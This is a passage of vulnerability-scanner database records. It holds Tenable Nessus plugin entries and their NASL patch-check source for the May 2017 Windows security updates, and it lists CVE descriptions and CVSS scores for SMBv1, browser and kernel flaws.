certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server 